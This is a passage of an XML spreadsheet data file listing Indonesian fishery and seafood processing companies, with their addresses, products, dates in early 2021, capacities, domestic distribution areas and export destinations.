    <s v="Jl. AW Syaharani No.289, Kel. Air Hitam, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-17T00:00:00"/>
    <n v="200"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23908"/>
    <x v="712"/>
    <s v="PT. NAGAMA SAMUDRA"/>
    <s v="Jl. Tukad Punggawa No.238X Lingkungan Banjar Ponjok, Kel. Serangan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur)"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Badung"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23909"/>
    <x v="712"/>
    <s v="PT. NAGAMA SAMUDRA"/>
    <s v="Jl. Tukad Punggawa No.238X Lingkungan Banjar Ponjok, Kel. Serangan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Kuwe, Kembung, Tenggiri)"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="24000"/>
    <s v="Kabupaten Badung"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23911"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="75000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Australia, China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23912"/>
    <x v="592"/>
    <s v="PT. BINTAN INTAN GEMILANG"/>
    <s v="Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="75000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Australia, China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23914"/>
    <x v="824"/>
    <s v="CV, BRIGHTFOOD RIUNG GUNUNG"/>
    <s v="Jl, Cikadut Atas No,33 RT 03 RW 05, Kel, Karang Pamulang, Kec, Mandalajati, Kota Bandung&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Yoghurt Rumput Laut"/>
    <d v="2021-01-25T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kabupaten Ciamis, Kota Bandung, Kota Cimahi, Kota Surakarta, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="23915"/>
    <x v="867"/>
    <s v="PT, AWINDO MAKMUR SEJAHTERA"/>
    <s v="Jl, Cumi Raya No, 8 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="216000"/>
    <m/>
    <s v="Suriname"/>
  </r>
  <r>
    <n v="23916"/>
    <x v="867"/>
    <s v="PT, AWINDO MAKMUR SEJAHTERA"/>
    <s v="Jl, Cumi Raya No, 8 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="R√©union, Spain"/>
  </r>
  <r>
    <n v="23918"/>
    <x v="948"/>
    <s v="PT. WAHANA PRONATURAL TBK"/>
    <s v="Pergudangan Tiara Jabon Blok B-6 Jl. Tambak Sawah No.1, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-24T00:00:00"/>
    <n v="5810000"/>
    <s v="Kabupaten Sidoarjo"/>
    <s v="China"/>
  </r>
  <r>
    <n v="23919"/>
    <x v="486"/>
    <s v="PT, TIRTA BITUNG BAHARI"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel, Aertembaga Satu, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Jenaha, Kakatua, Bawal)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang, Kota Manado"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23920"/>
    <x v="486"/>
    <s v="PT. TIRTA BITUNG BAHARI"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Terbang, Kembung, Lemadang)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang, Kota Manado"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23921"/>
    <x v="486"/>
    <s v="PT. TIRTA BITUNG BAHARI"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang, Kota Manado"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23922"/>
    <x v="949"/>
    <s v="PT. SK FOOD INDONESIA CABANG TARAKAN"/>
    <s v="Jl. Tanjung Batu RT 23, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Beku"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="570000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23925"/>
    <x v="597"/>
    <s v="PT. SEKAR LAUT, TBK"/>
    <s v="Jl. Jenggolo II/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Terasi Udang"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="23929"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Bawal, Gulama, Manyung, Kerapu, Layur, Kakap, Baronang)"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23930"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Segar"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23931"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Amberjack, Lemuru, Tongkol, Kembung, Salem, Selar, Banjar, Tenggiri)"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23932"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Segar (Lele, Mas, Gurami, Betutu, Patin, Nila)"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23933"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Segar"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23934"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23935"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23936"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Betutu, Patin, Nila)"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23938"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23939"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Salmon Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="750"/>
    <s v="Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23940"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23941"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="20000"/>
    <s v="Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kota Malang, Kota Probolinggo, Kota Pasuruan, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23942"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Malang, Kota Malang, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23943"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Malang, Kabupaten Banyuwangi, Kabupaten Gresik, Kota Malang, Kota Probolinggo, Kota Pasuruan, Kota Surabaya, Kota Batu"/>
    <m/>
  </r>
  <r>
    <n v="23944"/>
    <x v="697"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gindara, Seabass)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23945"/>
    <x v="950"/>
    <s v="PT. BRILIANT OCEAN FISH"/>
    <s v="Jl. Raya Tandurusa, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23946"/>
    <x v="950"/>
    <s v="PT. BRILIANT OCEAN FISH"/>
    <s v="Jl. Raya Tandurusa, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23947"/>
    <x v="950"/>
    <s v="PT. BRILIANT OCEAN FISH"/>
    <s v="Jl. Raya Tandurusa, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="23950"/>
    <x v="951"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Soekarno Hatta, Dusun Balong RT 003 RW 005, Kel. Gebang Ilir, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2021-02-19T00:00:00"/>
    <n v="540000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23951"/>
    <x v="952"/>
    <s v="PT. TARAKAN FISERINDO SIPATUO"/>
    <s v="Jl. Kurau RT 15, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1250000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="23952"/>
    <x v="894"/>
    <s v="PT. FISHINDO ISMA RAYA"/>
    <s v="Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Japan, New Zealand"/>
  </r>
  <r>
    <n v="23953"/>
    <x v="953"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Desa Halakodanuan, Kec. Ile Mandiri, Kabupaten Flores Timur&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Maubara, Tembang, Kembung)"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Pasuruan, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Thailand, United States"/>
  </r>
  <r>
    <n v="23954"/>
    <x v="953"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Desa Halakodanuan, Kec. Ile Mandiri, Kabupaten Flores Timur&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-01T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Pasuruan, Kota Surabaya, Kota Denpasar"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23956"/>
    <x v="867"/>
    <s v="PT, AWINDO MAKMUR SEJAHTERA"/>
    <s v="Jl, Cumi Raya No, 8 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin)"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="85000"/>
    <m/>
    <s v="Japan, Spain, United States"/>
  </r>
  <r>
    <n v="23960"/>
    <x v="954"/>
    <s v="PT. AWINDO"/>
    <s v="Jl. Area Galangan Kapal, Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="230000"/>
    <m/>
    <s v="Mexico, Ukraine, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="23962"/>
    <x v="955"/>
    <s v="PT. INDO SEA FOOD"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="2500000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23963"/>
    <x v="955"/>
    <s v="PT. INDO SEA FOOD"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga, Otak-Otak Ikan)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="2500000"/>
    <s v="Kota Padang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar, Kota Pontianak"/>
    <m/>
  </r>
  <r>
    <n v="23964"/>
    <x v="955"/>
    <s v="PT. INDO SEA FOOD"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tepung Ikan"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="23965"/>
    <x v="955"/>
    <s v="PT. INDO SEA FOOD"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23967"/>
    <x v="955"/>
    <s v="PT. INDO SEA FOOD"/>
    <s v="Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23973"/>
    <x v="956"/>
    <s v="CV. TRISNO LANGGENG"/>
    <s v="Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Malang, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23974"/>
    <x v="956"/>
    <s v="CV. TRISNO LANGGENG"/>
    <s v="Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kupas Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Semarang, Kota Surakarta, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23975"/>
    <x v="956"/>
    <s v="CV. TRISNO LANGGENG"/>
    <s v="Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Segar"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23976"/>
    <x v="956"/>
    <s v="CV. TRISNO LANGGENG"/>
    <s v="Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23977"/>
    <x v="956"/>
    <s v="CV. TRISNO LANGGENG"/>
    <s v="Jl. Nener 407 B, Kel. Kalianyar, Kec. Bangil, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Gresik, Kota Malang, Kota Mojokerto, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23989"/>
    <x v="957"/>
    <s v="PT. SUMBER NELAYAN SAMUDRA"/>
    <s v="Jl. Ikan Tuna Raya Barat No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23990"/>
    <x v="958"/>
    <s v="UD. JINAWI LUHUR"/>
    <s v="Jl. Kalijaga No.159, Kel. Pengambiran, Kec. Lemah Wungkuk, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerupuk Udang"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Saudi Arabia"/>
  </r>
  <r>
    <n v="23991"/>
    <x v="959"/>
    <s v="MYDEA FOOD"/>
    <s v="Kemusuk Kidul RT 01, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Siomay Ikan, Otak-otak Ikan, Kaki Naga, Bakso Tahu Ikan, Pempek Ikan) "/>
    <d v="2021-02-25T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surakarta, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="23992"/>
    <x v="761"/>
    <s v="PT. INDOBOGA JAYA MAKMUR"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Trout Segar"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23994"/>
    <x v="960"/>
    <s v="CV. FANIA FOOD"/>
    <s v="Jl. Gedongan Baru II No.14, Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Bandeng Duri Lunak"/>
    <d v="2021-02-25T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat, Kota Surakarta, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23995"/>
    <x v="960"/>
    <s v="CV. FANIA FOOD"/>
    <s v="Jl. Gedongan Baru II No.14, Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Ekkado, Otak-otak Ikan, Kaki Naga, Tahu Bakso Ikan, Siomay Ikan, Lumpia Ikan, Sempol Ikan, Bakwan Ikan) "/>
    <d v="2021-02-25T00:00:00"/>
    <n v="700"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23996"/>
    <x v="960"/>
    <s v="CV. FANIA FOOD"/>
    <s v="Jl. Gedongan Baru II No.14 , Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Otak-Otak Bandeng"/>
